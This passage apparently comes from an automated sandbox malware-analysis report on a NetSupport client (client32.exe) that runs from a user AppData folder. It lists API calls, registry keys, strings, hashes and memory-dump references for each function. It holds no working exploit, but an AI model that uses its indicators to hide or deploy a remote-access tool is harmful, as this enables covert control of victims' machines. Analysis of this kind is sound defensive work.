                                                                                                                • Instruction Fuzzy Hash: A0018435780715BFF3208EA5CD85F57FBA9DB45765F104138FA259B6C4D670E8048BA0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: wsprintf
                                                                                                                • String ID: %s%s%s.bin$124406$_HF$_HW$_SW
                                                                                                                • API String ID: 2111968516-2587288932
                                                                                                                • Opcode ID: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                                                                • Instruction ID: fa910be19caf0a14a4f119543ead50e584fafd0cecff00e00c2366bf95bcdf21
                                                                                                                • Opcode Fuzzy Hash: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                                                                • Instruction Fuzzy Hash: 2AE092A4E5460C9BF300A6498C11BAAFACC174475BFC4C051BFF9AB6A3E9299904C6D2
                                                                                                                APIs
                                                                                                                • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11103683
                                                                                                                • GetStockObject.GDI32(00000004), ref: 111036DB
                                                                                                                • RegisterClassA.USER32(?), ref: 111036EF
                                                                                                                • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 1110372C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                                                • String ID: NSMDesktopWnd
                                                                                                                • API String ID: 2669163067-206650970
                                                                                                                • Opcode ID: f412c802fa78ea5983901fd5e9bd27c26c396090c77b4c7bd5d98287236fca51
                                                                                                                • Instruction ID: a046934e961b92c42b42225909fe4a4d9db65d03d00dbebfa88e6fdde24b4f4f
                                                                                                                • Opcode Fuzzy Hash: f412c802fa78ea5983901fd5e9bd27c26c396090c77b4c7bd5d98287236fca51
                                                                                                                • Instruction Fuzzy Hash: E031F4B4D01719AFCB44CFA9D980AAEFBF8FB08314F50462EE42AE3244E7355900CB94
                                                                                                                APIs
                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen
                                                                                                                • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                                                • API String ID: 47109696-3245241687
                                                                                                                • Opcode ID: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
                                                                                                                • Instruction ID: 1d1f817806b548678a0140876f7b35b9e852c49707e53231e183cf95c3cf5809
                                                                                                                • Opcode Fuzzy Hash: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
                                                                                                                • Instruction Fuzzy Hash: 1E21DD71E0022A9BE764DA64CD80FDEF778AB45718F1041AAE81DF3941D7319D458BA3
                                                                                                                APIs
                                                                                                                  • Part of subcall function 11112140: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
                                                                                                                  • Part of subcall function 11112140: __wsplitpath.LIBCMT ref: 11112185
                                                                                                                  • Part of subcall function 11112140: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
                                                                                                                • GetComputerNameA.KERNEL32(?,?), ref: 11112288
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                                                • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                                                • API String ID: 806825551-1858614750
                                                                                                                • Opcode ID: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
                                                                                                                • Instruction ID: ca260b95ce0435fc80d5678de4b29a4f2f4f697687454b99fdfeb2ddb07782e0
                                                                                                                • Opcode Fuzzy Hash: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
                                                                                                                • Instruction Fuzzy Hash: C62149B6A042855AD701CE70DD80BFFFFAADB8A204F1445B8D851CB545E736D604C390
                                                                                                                APIs
                                                                                                                  • Part of subcall function 111447F0: GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                                                  • Part of subcall function 111447F0: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                                                • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E25
                                                                                                                • ResetEvent.KERNEL32(000002A0), ref: 11144E39
                                                                                                                • SetEvent.KERNEL32(000002A0), ref: 11144E4F
                                                                                                                • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E5E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                                                • String ID: MiniDump
                                                                                                                • API String ID: 1494854734-2840755058
                                                                                                                • Opcode ID: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                                                                • Instruction ID: ea994b22643fb5a56552c53957c3f10a02c9a0f0123a866c2d557df6367c4d32
                                                                                                                • Opcode Fuzzy Hash: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                                                                • Instruction Fuzzy Hash: 1F112975A8412577E710DBA8DC81F9BF768AB04B28F200230E634E7AC4EB74A50587A1
                                                                                                                APIs
                                                                                                                • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 111479DF
                                                                                                                • wsprintfA.USER32 ref: 11147A16
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                                • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                                • API String ID: 1985783259-2296142801
                                                                                                                • Opcode ID: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                                                                • Instruction ID: f4f04ea69c0c381d0959b313e9907706ba85fe26c30e15a9a088fcfc7c116df7
                                                                                                                • Opcode Fuzzy Hash: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                                                                • Instruction Fuzzy Hash: 6811E5FAE00218A7D710DEA49D81FEAF36C9B44608F100165FB08F6141EB70AA05CBE4
                                                                                                                APIs
                                                                                                                • _malloc.LIBCMT ref: 111101C9
                                                                                                                  • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                                                  • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                                                  • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                                • wsprintfA.USER32 ref: 111101E4
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                • _memset.LIBCMT ref: 11110207
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                                                • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                                                • API String ID: 3234921582-2664294811
                                                                                                                • Opcode ID: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
                                                                                                                • Instruction ID: 098e5996781ad60247c7fcf5caa4ca36f886f8102b778af333740a2f918ca33d
                                                                                                                • Opcode Fuzzy Hash: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
                                                                                                                • Instruction Fuzzy Hash: C0F0F6B6E4022863C7209AA49D01FEFF37C9F91609F0001A9FE05B7241EA75AA11C7E5
                                                                                                                APIs
                                                                                                                  • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75A38400), ref: 11145CA0
                                                                                                                  • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                                  • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                                                  • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                                                • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030D50,00000002), ref: 111466CF
                                                                                                                • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 111466E1
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,11030D50,00000002), ref: 111466F4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                                                                • String ID: SetProcessDpiAwareness$shcore.dll
                                                                                                                • API String ID: 1108920153-1959555903
                                                                                                                • Opcode ID: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
                                                                                                                • Instruction ID: b4913e853cd1401fb26aad2e9137c069c6cdc321efb83b495f2c8eb55c4c44ed
                                                                                                                • Opcode Fuzzy Hash: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
                                                                                                                • Instruction Fuzzy Hash: CDF0A03A781225A3E51912AABD58B9ABB5C9BC1A7EF150230F929D6DC0DB50C50082B5
                                                                                                                APIs
                                                                                                                • wsprintfA.USER32 ref: 11031FE6
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                                • String ID: %s%s.bin$124406$clientinv.cpp$m_pDoInv == NULL
                                                                                                                • API String ID: 4180936305-130860707
                                                                                                                • Opcode ID: bd07d82e204d55fca40885ac61f8c39d8728cbd3a2f7a07743be8c59493d1746
                                                                                                                • Instruction ID: 4b30c984cb9feb044c1d7ab8c0844ab34c920fbc261825ed793c706054f3ad77
                                                                                                                • Opcode Fuzzy Hash: bd07d82e204d55fca40885ac61f8c39d8728cbd3a2f7a07743be8c59493d1746
                                                                                                                • Instruction Fuzzy Hash: D82190B5F00705AFD710CF65CC41BAAB7F4EB88758F10853DE86697681EB35A8008B51
                                                                                                                APIs
                                                                                                                • GetFileAttributesA.KERNEL32(11145918,00000000,?,11145918,00000000), ref: 1114525C
                                                                                                                • __strdup.LIBCMT ref: 11145277
                                                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                  • Part of subcall function 11145240: _free.LIBCMT ref: 1114529E
                                                                                                                • _free.LIBCMT ref: 111452AC
                                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                • CreateDirectoryA.KERNEL32(11145918,00000000,?,?,?,11145918,00000000), ref: 111452B7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 398584587-0
                                                                                                                • Opcode ID: 9735d3e61c58080a89fa20c82b25ab644093a8acf898cd5def549394436bc947
                                                                                                                • Instruction ID: a914e2cea8ad1481f503ba01f1d1a08edacf548165b8a11fd341c03149d2e1b0
